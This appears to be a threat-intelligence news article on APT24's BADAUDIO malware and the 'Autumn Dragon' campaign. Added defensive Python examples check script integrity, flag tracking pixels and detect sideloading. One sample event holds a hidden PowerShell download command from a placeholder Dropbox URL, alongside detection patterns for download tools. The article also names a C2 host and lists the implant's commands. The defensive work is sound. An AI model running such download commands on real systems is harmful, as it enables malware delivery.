
A China-linked threat actor known as APT24 has been observed using previously undocumented malware known as BADAUDIO to establish persistent remote access to compromised networks as part of a nearly three-year campaign.
“While previous operations relied on a wide range of strategic web breaches to compromise legitimate websites, APT24 recently pivoted to using more sophisticated vectors to target organizations in Taiwan,” said Google Threat Intelligence Group (GTIG) researchers Harsh Parashar, Tierra Duncan, and Dan Perez.
“This includes repeated compromises of regional digital marketing companies and the use of targeted phishing campaigns to carry out supply chain attacks.”
APT24, also known as Pitty Tiger, is the name given to a suspected Chinese hacking group that targets the government, healthcare, construction/engineering, mining, nonprofit, and communications sectors in the United States and Taiwan.
According to a July 2014 report from FireEye, the attackers are believed to have been active as early as 2008. Their attacks use phishing emails to trick recipients into opening Microsoft Office documents that exploit known security flaws in the software (such as CVE-2012-0158 and CVE-2014-1761) to infect systems with malware.
Malware families associated with APT24 include CT RAT, a variant of Enfal/Lurid Downloader known as MM RAT (also known as Goldsun-B), and variants of Gh0st RAT known as Paladin RAT and Leo RAT. Another notable piece of malware used by the threat actor is a backdoor named Taidoor (also known as Roudan).
APT24 is assessed to be closely related to another Advanced Persistent Threat (APT) group called Earth Aughisky. That group also deployed Taidoor in its campaigns, leveraging infrastructure previously attributed to APT24 as part of a campaign to distribute another backdoor called Specas.

According to Trend Micro’s October 2022 report, both malware strains are designed to read proxy settings from a specific file: %systemroot%\system32\sprxx.dll.
According to GTIG’s latest findings, the BADAUDIO campaign has been ongoing since November 2022, with attackers using watering holes, supply chain compromises, and spear phishing as initial access vectors.
BADAUDIO, a highly obfuscated malware written in C++, uses control flow flattening to resist reverse engineering and acts as a first-stage downloader that can download, decrypt, and execute AES-encrypted payloads from a hardcoded command-and-control (C2) server. It works by gathering basic system information and exfiltrating it to the server, which responds with a payload that is then executed on the host. In one case, that payload was a Cobalt Strike Beacon.
BADAUDIO campaign overview
“BADAUDIO typically manifests itself as a malicious dynamic link library (DLL) that leverages DLL search order hijacking (MITRE ATT&CK T1574.001) to execute through legitimate applications,” GTIG said. “The recently observed variant exhibits a sophisticated execution chain. The encrypted archive contains the BADAUDIO DLL along with VBS, BAT, and LNK files.”
From November 2022 to at least early September 2025, APT24 is estimated to have compromised more than 20 legitimate websites, injected malicious JavaScript code that specifically excluded visitors from macOS, iOS, and Android, used the FingerprintJS library to generate a unique browser fingerprint, and displayed fake pop-ups disguised as Google Chrome updates inviting users to download BADAUDIO.
Then, starting in July 2024, the hacking group infiltrated a regional digital marketing company in Taiwan and orchestrated a supply chain attack by injecting malicious JavaScript into a widely used JavaScript library distributed by the company, effectively allowing it to hijack more than 1,000 domains.
The modified third-party script is configured to impersonate a legitimate Content Delivery Network (CDN) to access the typosquatted domain, obtain attacker-controlled JavaScript to fingerprint the machine, and, upon verification, display a pop-up to download BADAUDIO.
“The June 2025 breach originally used conditional script loading based on a unique web ID (specific domain name) associated with the website using the compromised third-party script,” Google said. “This suggests customized targeting to limit strategic web compromise (MITRE ATT&CK T1189) to a single domain.”
Compromised JS supply chain attack to distribute BADAUDIO malware
“However, for 10 days in August, this condition was temporarily lifted, allowing all 1,000 domains using the script to be compromised before the original restrictions were reimposed.”
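The supply chain compromise described above worked because the affected sites loaded a vendor-distributed script with no way to tell the vendor's version from a modified one. Subresource Integrity (SRI) is the standard browser control for that gap: the site pins a hash of the expected script in the integrity attribute, and the browser refuses to run anything that does not match. The following Python example, added here and not code from the original article or from GTIG, computes and verifies SRI values in the W3C format; the two script bodies are constructed samples, and the "appended line" stands in for any modification, whatever its content.

```python
import base64
import hashlib
import hmac

# Constructed sample: the script a site intends to load from its marketing vendor.
ORIGINAL_SCRIPT = b"(function(){window.vendorWidget={version:'1.0'};})();\n"

# Constructed sample: the same script with one line appended by someone other than
# the vendor. What the line contains is irrelevant; any byte change breaks the hash.
TAMPERED_SCRIPT = ORIGINAL_SCRIPT + b"/* constructed: appended after distribution */\n"

# SRI permits only these digests; when several are pinned, the strongest wins.
STRENGTH = {"sha256": 0, "sha384": 1, "sha512": 2}


def sri_integrity(content: bytes, algo: str = "sha384") -> str:
    """Return the value for a <script integrity="..."> attribute."""
    if algo not in STRENGTH:
        raise ValueError("SRI only permits sha256, sha384 or sha512")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(content: bytes, integrity: str) -> bool:
    """Decide as a browser would: keep only tokens of the strongest algorithm
    present, and accept if any of them matches the fetched bytes."""
    tokens = [t for t in integrity.split() if t.partition("-")[0] in STRENGTH]
    if not tokens:
        return False  # no usable hash pinned: nothing to enforce
    strongest = max(STRENGTH[t.partition("-")[0]] for t in tokens)
    candidates = [t for t in tokens if STRENGTH[t.partition("-")[0]] == strongest]
    return any(
        hmac.compare_digest(sri_integrity(content, t.partition("-")[0]), t)
        for t in candidates
    )


def script_tag(url: str, content: bytes) -> str:
    """Emit the tag a site would ship; crossorigin is required for SRI on
    cross-origin scripts so the browser can read the response bytes."""
    return (f'<script src="{url}" integrity="{sri_integrity(content)}" '
            f'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    pinned = sri_integrity(ORIGINAL_SCRIPT)
    print(script_tag("https://vendor.example/widget.js", ORIGINAL_SCRIPT))  # hypothetical URL
    print("original verifies:", verify_sri(ORIGINAL_SCRIPT, pinned))
    print("tampered verifies:", verify_sri(TAMPERED_SCRIPT, pinned))
```

The trade-off is that a vendor who legitimately updates the script will break every site that pinned the old hash, which is exactly the review step that was missing here: the change becomes visible instead of silently reaching every domain. SRI does not help in the first scenario the article describes, where the compromised website itself serves the injected JavaScript, and a vendor who controls the pinned tag can still ship a bad hash alongside a bad script; it raises the bar for modification after distribution, not for a malicious or fully compromised origin.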
APT24 has also been observed conducting targeted phishing attacks since August 2024, using decoys associated with animal protection organizations to trick recipients into responding, ultimately delivering BADAUDIO via encrypted archives hosted on Google Drive and Microsoft OneDrive. These messages have a tracking pixel embedded in them to see if the target has opened the email and adjust the attack accordingly.
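The tracking pixel mentioned above is an ordinary remote image that the mail client fetches on open, which is why the usual mitigations are to block remote content by default and to flag messages that carry hidden images. The following Python example, added here and not code from the original article, shows the flagging side: it parses an HTML body and reports images that are both remote and invisible (1x1 or smaller, or hidden by style). The message HTML and the tracker host are constructed samples.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message: one visible logo, one 1x1 pixel, one hidden image.
SAMPLE_EMAIL = """
<html><body>
<img src="https://example.org/logo.png" width="200" height="50" alt="logo">
<p>Please review the attached report on the shelter programme.</p>
<img src="https://tracker.example/o?id=PLACEHOLDER" width="1" height="1">
<img src="https://tracker.example/b.gif" style="display:none;width:0;height:0">
<img src="cid:inline-photo" width="1" height="1">
</body></html>
"""


def _dim(value):
    """Parse a width/height attribute such as '1' or '1px'; None if absent or odd."""
    if value is None:
        return None
    try:
        return int(value.strip().lower().removesuffix("px"))
    except ValueError:
        return None


class PixelFinder(HTMLParser):
    """Collect src values of remote images that a reader would never see."""

    def __init__(self):
        super().__init__()
        self.suspects = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = dict(attrs)
        src = a.get("src", "") or ""
        # Only images fetched over the network can report an open; cid:/data: cannot.
        if urlparse(src).scheme not in ("http", "https"):
            return
        w, h = _dim(a.get("width")), _dim(a.get("height"))
        tiny = w is not None and h is not None and w <= 1 and h <= 1
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = "display:none" in style or "visibility:hidden" in style
        if tiny or hidden:
            self.suspects.append(src)


def find_tracking_pixels(html: str) -> list:
    finder = PixelFinder()
    finder.feed(html)
    finder.close()
    return finder.suspects


if __name__ == "__main__":
    for src in find_tracking_pixels(SAMPLE_EMAIL):
        print("hidden remote image:", src)
```

A gateway would typically combine this with the sender's domain (a pixel on a host unrelated to the sender is the stronger signal) and with the policy of not fetching remote images until the user asks, which removes the open-notification the attacker relies on to time the next step.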
“The use of advanced techniques, including supply chain compromises, multi-layered social engineering, and exploitation of legitimate cloud services, demonstrates the attackers’ persistent and adaptive espionage capabilities,” Google said in a statement.
Suspected China-aligned APT group targets Southeast Asia
The disclosure comes as CyberArmor details sustained espionage operations orchestrated by threat actors believed to have ties to China against the governments, media, and news sectors of Laos, Cambodia, Singapore, the Philippines, and Indonesia. This activity has been codenamed “Autumn Dragon.”
The attack chain begins with a RAR archive, apparently sent as an attachment to a spear-phishing message, which, once extracted, launches a batch script (‘Windows Defender Definition Update.cmd’) that exploits a security flaw in WinRAR (CVE-2025-8088, CVSS score: 8.8). This script sets up persistence so that the malware is automatically launched the next time the user logs into the system.

It also downloads a second RAR archive hosted on Dropbox via PowerShell. That archive contains two files: a legitimate executable (‘obs-browser-page.exe’) and a malicious DLL (‘libcef.dll’). The batch script then executes the binary to sideload the DLL, which communicates with the attacker via Telegram to obtain commands (“Shell”), capture a screenshot (“Screenshot”), and drop an additional payload (“Upload”).
“Bot controllers (threat actors) use these three commands to gather information, spy on the victim’s computer, and deploy third-stage malware,” security researchers Nguyen Nguyen and BartBlaze said. “This design allows the controller to remain stealthy and avoid detection.”
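Two points in the chain just described are visible in ordinary process-creation telemetry: a batch script spawning PowerShell to fetch an archive from a file-sharing service, and a legitimate sideloading host (obs-browser-page.exe, later Creative Cloud Helper.exe) running from a user-writable folder rather than its install directory. The following Python example, added here and not code from the original article or from CyberArmor, runs those two checks over constructed EDR-style JSON events. The field names, the Dropbox path (marked PLACEHOLDER) and the list of file-sharing hosts are assumptions for the example; the executable names come from the article.

```python
import json
import re

# Constructed sample events in an EDR-style JSON-lines shape; not real telemetry.
SAMPLE_EVENTS = r"""
{"ts":"2025-09-01T08:00:01Z","host":"ws01","user":"alice","parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -File C:\\Scripts\\inventory.ps1"}
{"ts":"2025-09-01T08:02:10Z","host":"ws01","user":"alice","parent_image":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -w hidden -c \"Invoke-WebRequest https://www.dropbox.com/s/PLACEHOLDER/update.rar -OutFile $env:TEMP\\update.rar\""}
{"ts":"2025-09-01T08:02:30Z","host":"ws01","user":"alice","parent_image":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Users\\alice\\AppData\\Local\\Temp\\update\\obs-browser-page.exe","cmdline":"obs-browser-page.exe"}
{"ts":"2025-09-01T09:15:00Z","host":"ws02","user":"bob","parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Program Files\\obs-studio\\bin\\64bit\\obs-browser-page.exe","cmdline":"obs-browser-page.exe --type=renderer"}
"""

# Download verbs commonly seen in PowerShell one-liners (assumed list, not exhaustive).
DOWNLOAD_VERBS = re.compile(
    r"\b(Invoke-WebRequest|iwr|DownloadFile|DownloadString|Start-BitsTransfer|curl|wget)\b", re.I)
# File-sharing hosts; the article names Dropbox, Google Drive and OneDrive as delivery points.
SHARING_HOSTS = re.compile(r"(dropbox\.com|drive\.google\.com|onedrive\.live\.com|1drv\.ms)", re.I)
# Interpreters that run .cmd/.bat/.vbs content.
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe"}
# Locations an ordinary user can write to; signed software is not installed here.
USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\(AppData|Downloads|Desktop)|Temp|ProgramData)\\", re.I)
# Legitimate binaries the article reports being abused to sideload a DLL.
SIDELOAD_HOSTS = {"obs-browser-page.exe", "creative cloud helper.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(lines) -> list:
    """Return (rule, timestamp) pairs for events matching either check."""
    findings = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        ev = json.loads(raw)
        parent, image, cmd = basename(ev["parent_image"]), basename(ev["image"]), ev["cmdline"]

        # Check 1: a script interpreter spawned PowerShell that fetches from a sharing service.
        if (parent in SCRIPT_HOSTS and image in {"powershell.exe", "pwsh.exe"}
                and DOWNLOAD_VERBS.search(cmd) and SHARING_HOSTS.search(cmd)):
            findings.append(("script_spawned_powershell_cloud_download", ev["ts"]))

        # Check 2: a known sideloading host executing outside its install directory.
        if image in SIDELOAD_HOSTS and USER_WRITABLE.search(ev["image"]):
            findings.append(("sideload_host_from_user_writable_path", ev["ts"]))
    return findings


if __name__ == "__main__":
    for rule, ts in detect(SAMPLE_EVENTS.splitlines()):
        print(ts, rule)
```

The second check only notices the host binary; confirming the sideload itself needs image-load telemetry showing libcef.dll or CRClient.dll loaded from the same user-writable folder, which is the natural follow-up query once either rule fires. The fourth sample event, the same executable under Program Files, shows why the path condition matters: the binary names are legitimate and will appear constantly on hosts that actually run OBS or Creative Cloud.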

The third stage again uses DLL sideloading to launch the malicious DLL (‘CRClient.dll’) using the real binary (‘Creative Cloud Helper.exe’). It then decrypts and executes the shellcode responsible for loading and executing the final payload. This is a lightweight implant written in C++ that can communicate with a remote server (‘public.megadatacloud[.]com’) and supports eight different commands:
Command 65: run the specified command with cmd.exe, collect the output, and send it back to the C2 server
Command 66: load and execute a DLL
Command 67: execute shellcode
Command 68: update the configuration
Command 70: read a file specified by the operator
Command 71: open a file and write content supplied by the operator
Command 72: get or set the current directory
Command 73: sleep for a random interval and then terminate
This activity has not been linked to any specific actor or group, but may be the work of a Chinese-aligned group with intermediate operational capabilities. This assessment is based on the adversary’s continued targeting of countries bordering the South China Sea.
“The attack campaign was highly targeted,” the researchers said. “Through our analysis, we frequently observed that the following stages were hosted behind Cloudflare with geo-restrictions enabled, as well as other restrictions such as only allowing certain HTTP user agents.”
